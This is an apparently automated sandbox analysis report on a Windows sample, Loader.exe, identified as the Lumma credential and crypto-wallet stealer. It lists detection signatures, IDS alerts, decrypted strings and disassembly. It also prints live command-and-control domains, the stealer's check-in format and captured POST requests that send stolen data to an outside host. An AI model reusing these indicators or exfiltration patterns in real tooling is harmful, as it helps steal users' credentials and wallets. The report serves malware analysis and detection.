Windows Analysis Report
Loader.exe

Overview

General Information

Sample name: Loader.exe
Analysis ID: 1582939
MD5: 0792fce4557cae0687a02e5e41be587a
SHA1: 1bac30844ed9b13082a7df999518b0cc59759278
SHA256: 6e7b661fb3b6610bc026dd050824e7faaf3bd3b5fa0b168d941858fc694ba871
Tags: exe user-Raidr

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 5164 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 0792FCE4557CAE0687A02E5E41BE587A)
    • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 2588 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 0792FCE4557CAE0687A02E5E41BE587A)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tirepublicerj.shop", "noisycuttej.shop", "nearycrepso.shop", "rabidcowse.shop", "wholersorie.shop", "fancywaxxers.shop", "cloudewahsj.shop", "abruptyopsn.shop", "framekgirus.shop"], "Build id": "yau6Na--6524795094"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
Process Memory Space: Loader.exe PID: 2588 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Loader.exe PID: 2588 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Loader.exe PID: 2588 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Loader.exe PID: 2588 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T02:56:56.188431+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:57.422798+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:58.724005+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:59.828044+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:01.065590+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:02.521703+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:04.160117+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:06.388204+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:56.941241+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:57.893852+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:06.874165+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:56.941241+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:57.893852+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:56.188431+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49730 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:57.422798+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49731 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:58.724005+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49732 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:59.828044+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:01.065590+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:02.521703+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49735 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:04.160117+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49736 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:06.388204+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49737 | 104.21.48.1 | 443 | TCP
2025-01-01T02:56:55.706456+0100 | 2058656 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 61080 | 1.1.1.1 | 53 | UDP
2025-01-01T02:57:00.384585+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 104.21.48.1 | 443 | TCP
2025-01-01T02:57:04.233693+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.48.1 | 443 | TCP

AV Detection

Source: https://fancywaxxers.shop:443/apiackages | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apil | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/AA | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "noisycuttej.shop", "nearycrepso.shop", "rabidcowse.shop", "wholersorie.shop", "fancywaxxers.shop", "cloudewahsj.shop", "abruptyopsn.shop", "framekgirus.shop"], "Build id": "yau6Na--6524795094"}
Source: Loader.exe | ReversingLabs: Detection: 44%
Source: Loader.exe | Virustotal: Detection: 38%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 92.5% probability
Source: Loader.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: rabidcowse.shop
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: noisycuttej.shop
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: tirepublicerj.shop
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: framekgirus.shop
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: wholersorie.shop
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: abruptyopsn.shop
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: nearycrepso.shop
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: fancywaxxers.shop
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1666099805.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: yau6Na--6524795094
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_2_00415270 CryptUnprotectData, 2_2_00415270
Source: Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D4B6E8 FindFirstFileExW, 0_2_00D4B6E8
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00D4B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00D4B799
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 2_2_0043F950
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 6B77B5E1h | 2_2_00440980
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ecx, eax | 2_2_0040A9B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00415270
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0000022Ah] | 2_2_00415270
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then jmp edx | 2_2_00422A28
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00423288
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ecx, eax | 2_2_0040CB18
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h | 2_2_00440BA0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7AAE27ECh] | 2_2_004224ED
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00418C90
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], ebx | 2_2_00409DEC
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh] | 2_2_0043F040
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+14h] | 2_2_0042C055
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-11ACFC83h] | 2_2_00409814
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-1A526408h] | 2_2_00409814
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0041B839
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ebx, eax | 2_2_004058C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ebp, eax | 2_2_004058C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 2_2_0042A0A0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ecx, ebx | 2_2_00428150
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00428150
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+69ABA241h] | 2_2_00425784
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then jmp ecx | 2_2_0042796F
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh] | 2_2_0043F130
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 2_2_00419980
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov dword ptr [esp+04h], eax | 2_2_00409240
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh] | 2_2_00408A70
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov edx, ecx | 2_2_0042BAC4
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh | 2_2_0043C280
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp eax, BFFFFFFFh | 2_2_0043C280
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h | 2_2_0043C280
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh | 2_2_0043C280
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h | 2_2_0043C280
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh] | 2_2_0043F2B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx eax, word ptr [ebp+00h] | 2_2_00439B49
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh] | 2_2_0043F350
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_00429B60
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx edx, byte ptr [ecx+esi] | 2_2_00402B70
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh] | 2_2_0043F3E0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [edi+ebx*8], 6E87DD67h | 2_2_00439460
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [edx+edi*8], 31E2A9F4h | 2_2_00439460
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then test eax, eax | 2_2_00439460
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov byte ptr [ebp+00h], al | 2_2_0041DC10
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 2_2_00407420
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 2_2_00407420
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h | 2_2_00440CD0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00428490
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 2_2_0042A500
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0041AD10
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx] | 2_2_0041E5F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h] | 2_2_00421D90
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h | 2_2_00423E61
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042C6D2
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0042C675
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov edi, ebx | 2_2_0042B693
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-5Fh] | 2_2_0043F6A0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov edi, ecx | 2_2_00426740
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [ebx], cx | 2_2_00414760
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 2_2_00414760
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx edx, byte ptr [edi+eax] | 2_2_00414760
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-74590DBEh] | 2_2_00414760
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+04h] | 2_2_00426760
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_00426760
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ebx, ecx | 2_2_00416711
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-11ACFC83h] | 2_2_00409710
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-1A526408h] | 2_2_00409710
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0042873A
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then mov ebx, ecx | 2_2_00416FC4
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_00434FD0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+69ABA241h] | 2_2_00425784
Source: C:\Users\user\Desktop\Loader.exe | Code function: 4x nop then jmp eax | 2_2_00417FB1

Networking

Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49731 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49737 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49730 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.4:61080 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49736 -> 104.21.48.1:443
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: fancywaxxers.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Joe Sandbox View | IP Address: 104.21.48.1
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.48.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0N84MEPGBSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18120Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OG750WXNTGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8741Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XC0RK74IM4TDJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20412Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3HXJG0UTZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1218Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GDPI4RY1FL2OPHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586169Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fancywaxxers.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
